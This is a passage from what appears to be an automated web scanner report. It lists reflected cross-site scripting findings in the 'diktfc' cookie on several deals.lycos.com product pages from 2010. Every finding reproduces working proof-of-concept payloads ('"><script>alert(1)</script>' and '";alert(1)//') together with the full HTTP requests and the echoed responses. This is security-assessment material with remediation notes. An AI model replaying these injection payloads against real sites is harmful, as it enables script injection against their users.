Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:09 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0&amp;cj=1" alt="tracker" />
...[SNIP]...

3.203. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf6"%3balert(1)//17d3e5f2582 was submitted in the diktfc cookie. This input was echoed as 34cf6";alert(1)//17d3e5f2582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6"%3balert(1)//17d3e5f2582; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6";alert(1)//17d3e5f2582"
});
</script>
...[SNIP]...

3.204. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57098"><script>alert(1)</script>17fbef7573c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c&amp;cj=1" alt="tracker" />
...[SNIP]...

3.205. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-32-1080p-lcd-hdtv-for-399-414373

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec67"><script>alert(1)</script>28b95ad8bc4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
mg src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4&amp;cj=1" alt="tracker" />
...[SNIP]...

3.206. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-32-1080p-lcd-hdtv-for-399-414373

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ca8"%3balert(1)//8f632b01aa9 was submitted in the diktfc cookie. This input was echoed as b1ca8";alert(1)//8f632b01aa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8"%3balert(1)//8f632b01aa9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ext/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8";alert(1)//8f632b01aa9"
});
</script>
...[SNIP]...

3.207. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-42-1080p-lcd-hdtv-for-479-414598

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc41"><script>alert(1)</script>85a55a54eb2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
mg src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2&amp;cj=1" alt="tracker" />
...[SNIP]...

3.208. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-42-1080p-lcd-hdtv-for-479-414598

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb5d0"%3balert(1)//a5de5727a34 was submitted in the diktfc cookie. This input was echoed as eb5d0";alert(1)//a5de5727a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0"%3balert(1)//a5de5727a34; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ext/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0";alert(1)//a5de5727a34"
});
</script>
...[SNIP]...

3.209. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/logmein-ignition-for-iphone-for-20-413418

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f448f"><script>alert(1)</script>e4b28d91281 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281&amp;cj=1" alt="tracker" />
...[SNIP]...

3.210. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/logmein-ignition-for-iphone-for-20-413418

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f691"%3balert(1)//38cfa6531c3 was submitted in the diktfc cookie. This input was echoed as 6f691";alert(1)//38cfa6531c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691"%3balert(1)//38cfa6531c3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691";alert(1)//38cfa6531c3"
});
</script>
...[SNIP]...

3.211. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mirror-s-edge-for-iphone-for-1-414300

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa8ec"><script>alert(1)</script>6cc672e8440 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440&amp;cj=1" alt="tracker" />
...[SNIP]...

3.212. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mirror-s-edge-for-iphone-for-1-414300

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d87f"%3balert(1)//0adce29b43c was submitted in the diktfc cookie. This input was echoed as 4d87f";alert(1)//0adce29b43c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f"%3balert(1)//0adce29b43c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f";alert(1)//0adce29b43c"
});
</script>
...[SNIP]...

3.213. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971

Issue detail

